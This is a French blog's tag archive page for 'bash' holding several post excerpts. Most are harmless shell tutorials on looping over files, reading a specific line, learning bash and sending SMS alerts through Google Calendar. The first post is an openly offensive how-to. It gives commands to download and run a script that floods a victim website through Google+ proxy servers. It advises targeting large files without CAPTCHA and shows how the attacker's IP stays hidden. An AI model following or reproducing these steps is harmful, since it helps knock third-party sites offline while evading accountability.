Archive

Articles taggués ‘bash’

Launch DDoS Attack Using Google Servers with +DDoS Bash Script

27/09/2023 Comments off

DDoS-Using-Google+-Servers-HackersGarageRecently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy.

How DDoS Attack Using Google+ Servers works?

When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.

Advisory report says;  vulnerable pages are “/_/sharebox/linkpreview/“  and “gadgets/proxy?

So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.

How to use DDoS script to launch a DDoS attack Using Google+ Servers?

Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com

Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh

Make it executable :
chmod u+x ddos.sh

Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000

Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.

e.g http://www.victim-website.com/some-file-url/file-name.mp3

NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation ?

e.g 1000 is very big number.

You will see anonymous source instead of Real Source IP:
See sample apache webserver log below

209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"

You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :

https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none

Source: hackersgarage.com

Categories: Réseau, Sécurité Tags: , , , , ,

Learning bash scripting for beginners

30/07/2023 Comments off

Bash (Bourne-Again SHell) is a Linux and Unix-like system shell or command language interpreter. It is a default shell on many operating systems including Linux and Apple OS X. Today, we’ll see how to quickly learn scripting.

If you have always used a graphic user interface like KDE or Gnome or MS-Windows or Apple OS X, you are likely to find bash shell confusing. If you spend some time with the bash shell prompt and it will be difficult for you to go back.

learn-bash

Here are a list of tutorials and helpful resources to help you learn bash scripting and bash shell itself.

Lire la suite…

Categories: Système Tags: , , ,

Bash Shell Loop Over Set of Files

19/07/2023 Comments off

bash shell loopBash Shell Loop

How do I run shell loop over set of files stored in a current directory or specified directory?

You can use for loop easily over a set of shell file under bash or any other UNIX shell using wild card character.

Syntax

The general syntax is as follows:

for f in file1 file2 file3 file5
do
 echo "Processing $f"
 # do something on $f
done

You can also use shell variables:

FILES="file1
/path/to/file2
/etc/resolv.conf"
for f in $FILES
do
	echo "Processing $f"
done

You can loop through all files such as *.c, enter:

$ for f in *.c; do echo "Processing $f file.."; done

Lire la suite…

Categories: Système Tags: , , ,

Alertes par SMS en Bash (via Google Calendar)

07/05/2023 Comments off

La remontée d’alerte par SMS (“Short Message Service”) est un plus non négligeable dans le monitoring de systèmes d’informations critiques.

Les services gratuits permettant d’utiliser les SMS depuis le système restent rare.

Depuis plusieurs années déjà, “Google Agenda” propose à ses clients des rappels de rendez-vous par SMS.
Rapidement, ce service Google fût détourné pour être utilisé comme source de remontée d’alertes (exemple : “SmsAlert : Envoyer des SMS gratuitement depuis ses serveurs” sur le site Macsim’s Mind qui utilisait le script PHP d’ Alexander Skakunov pour remonter des alertes par SMS).

Bien que très efficaces, la plupart de ces détournement sont implémentés en PHP qui n’est pas installé sur tous les serveurs.

L’idée de cet article et d’utiliser la même technique mais implémentée en BASH.

Principe de fonctionnement

Le principe est de créer un événement dans un agenda Google Calendar débutant dans 5 minutes et X secondes et d’avertir l’administrateur par SMS 5 minutes avant le début de l’événement. Le SMS sera donc envoyé après X secondes.

L’objectif du script “googalert” (disponible sur sourceforge) est de n’utiliser que des commandes classiques du shell, de pouvoir choisir l’agenda dans lesquels seront stockés les alertes et d’être parfaitement conforme à l’API Google(http://www.udel.edu/CIS/software/dist/google/calendar/java.client/gdata/doc/calendar.htmlvoir Add an event).

Lire la suite…

Categories: Système Tags: , , ,

Read a Specific Line From a File in Linux

06/05/2023 Comments off

1. Overview

Reading text files is a common operation when we work with the Linux command-line. Sometimes, we know the line X in a file contains interesting data, and we want to just read line X.

In this quick tutorial, we’ll have a look at different approaches to read a specific line from a file.

2. Introduction to the Problem

The problem is pretty straightforward. Let’s get a more clear picture through an example.

For instance, we have a file called input.txt:

$ nl input.txt 
     1	I am line 1, I don't have any interesting data.
     2	I am line 2, I don't have any interesting data.
     3	I am line 3, I don't have any interesting data.
     4	I am line 4, I don't have any interesting data.
     5	I am line 5, interesting data: Linux is awesome!
     6	I am line 6, I don't have any interesting data.
     7	I am line 7, I don't have any interesting data.

As the output above shows, we’ve used the nl command to print the file’s content with line numbers.

We know that the input.txt file contains some interesting information in the fifth line. Therefore, we want to read line five only.

Lire la suite…

Categories: Système Tags: ,